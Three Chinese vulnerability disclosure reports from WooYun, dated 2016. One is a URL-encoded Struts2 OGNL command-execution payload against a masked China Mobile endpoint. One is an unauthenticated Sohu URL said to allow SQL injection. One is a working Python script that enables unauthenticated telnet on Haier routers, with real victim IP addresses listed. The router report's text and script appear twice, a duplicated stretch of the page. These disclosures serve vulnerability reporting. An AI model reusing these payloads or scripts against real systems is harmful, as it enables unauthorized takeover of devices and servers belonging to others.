漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-29： 厂商已经确认，细节仅向厂商公开2016-05-09： 细节向核心白帽子及相关领域专家公开2016-05-19： 细节向普通白帽子公开2016-05-29： 细节向实习白帽子公开2016-06-13： 细节向公众公开简要描述：RT详细说明： code 区域https://**.**.**.**/checkUidAvailable.action POST redirect%3A%24%7B%23res%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23res.setCharacterEncoding%28%22UTF-8%22%29%2C%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%22echo%22%2C%22test%20by%20d%22%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%**.**.**.**.InputStreamReader%28%23b%29%2C%23d%3Dnew%**.**.**.**.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B9%5D%2C%23d.read%28%23e%29%2C%23res.getWriter%28%29.println%28%23e%29%2C%23res.getWriter%28%29.flush%28%29%2C%23res.getWriter%28%29.close%28%29%7D  漏洞证明：https://**.**.**.**/checkUidAvailable.action祭出工具内网的权限，如果反弹一个出来。可以弄到好多敏感信息或者漫游下内网啥的修复方案： 版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：中漏洞Rank：8确认时间：2016-04-29 12:34厂商回复：CNVD未复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.最新状态：暂无

漏洞详情披露状态： 2016-05-04： 细节已通知厂商并且等待厂商处理中2016-05-05： 厂商已经确认，细节仅向厂商公开2016-05-15： 细节向核心白帽子及相关领域专家公开2016-05-25： 细节向普通白帽子公开2016-06-04： 细节向实习白帽子公开2016-06-19： 细节向公众公开简要描述：维护人员app 没有检查网址安全详细说明：未授权访问 http://accesslicense.hd.sohu.com:8888/device?_method=post&register=True&smsDeviceId=27加sql 漏洞证明：        修复方案：不用我多说版权声明：转载请注明来源 Ｈ.Ｕ.Ｃ－人 族@乌云漏洞回应厂商回应：危害等级：高漏洞Rank：12确认时间：2016-05-05 09:51厂商回复：感谢支持！最新状态：暂无

漏洞详情披露状态： 2016-04-27： 细节已通知厂商并且等待厂商处理中2016-04-27： 厂商已查看当前漏洞内容,细节仅向厂商公开2016-04-28： 厂商已经主动忽略漏洞，细节向公众公开简要描述：WIFI安全之海尔无线路由器存在高危漏洞可直接控制设备详细说明：该无线路由被大量使用，可通过该网站搜索：https://www.oshadan.com/main，关键字：Haier Wifi，可搜索到5000+经测试发现，该路由的/st_device.asp 文件有这样一个功能，如图：”启用 telnet远程管理“，打开这一选项，是不是就可以telnet了呢，试试选择该项，点击确定，然后执行：telnet xxx.xxx.xxx.xxx 23奇迹出现了，可直接登录设备，执行一系列的命令。便于测试，我简单写了一个python脚本，开通该功能：code 区域import sys import requests #url = sys.argv[1] url = 'http://124.152.236.162' if 'http' not in url: os._exit() url = "{}/apply.cgi".format(url) data = "igmp_enable=0&upnp_enable=1&syslogd_enable=1&telnetd_enable=1&reboot_enable=0&submit_button=st_device&change_action=&action=Apply&upnpEn=on&remote_management=0&rtelnetd=0&syslogd=0&reboot_start_hour=0&reboot_start_min=0" print '[*] Opening telnet ..' req = requests.post(url, data=data) if req.status_code == 200: print '[*] Success ..'直接运行该脚本，即可开通telnet远程控制的功能。随机选择一些案例来进行漏洞证明：0x1 http://124.152.236.162telnet 124.152.236.162 230x2 http://124.152.236.186telnet 124.152.236.186 230x3 http://49.117.1.98/telnet 49.117.1.98 23再给出一些案例：code 区域http://49.117.1.98/ http://124.152.236.186 http://124.152.236.162 http://72.130.248.15/ http://77.35.7.104/ 漏洞证明：该无线路由被大量使用，可通过该网站搜索：https://www.oshadan.com/main，关键字：Haier Wifi，可搜索到5000+经测试发现，该路由的/st_device.asp 文件有这样一个功能，如图：”启用 telnet远程管理“，打开这一选项，是不是就可以telnet了呢，试试选择该项，点击确定，然后执行：telnet xxx.xxx.xxx.xxx 23奇迹出现了，可直接登录设备，执行一系列的命令。便于测试，我简单写了一个python脚本，开通该功能：code 区域import sys import requests #url = sys.argv[1] url = 'http://124.152.236.162' if 'http' not in url: os._exit() url = "{}/apply.cgi".format(url) data = "igmp_enable=0&upnp_enable=1&syslogd_enable=1&telnetd_enable=1&reboot_enable=0&submit_button=st_device&change_action=&action=Apply&upnpEn=on&remote_management=0&rtelnetd=0&syslogd=0&reboot_start_hour=0&reboot_start_min=0" print '[*] Opening telnet ..' req = requests.post(url, data=data) if req.status_code == 200: print '[*] Success ..'直接运行该脚本，即可开通telnet远程控制的功能。随机选择一些案例来进行漏洞证明：0x1 http://124.152.236.162telnet 124.152.236.162 230x2 http://124.152.236.186telnet 124.152.236.186 230x3 http://49.117.1.98/telnet 49.117.1.98 23 修复方案：加强权限验证版权声明：转载请注明来源 路人甲@乌云漏洞回应厂商回应：危害等级：无影响厂商忽略忽略时间：2016-04-28 17:33厂商回复： 最新状态：2016-04-28：感谢白帽子的测试与提醒，该漏洞属于已知问题，WooYun-2016-196887，WooYun-2015-155274，并且最新版本5.9.4.3已经修正该问题。欢迎继续关注海尔安全，谢谢。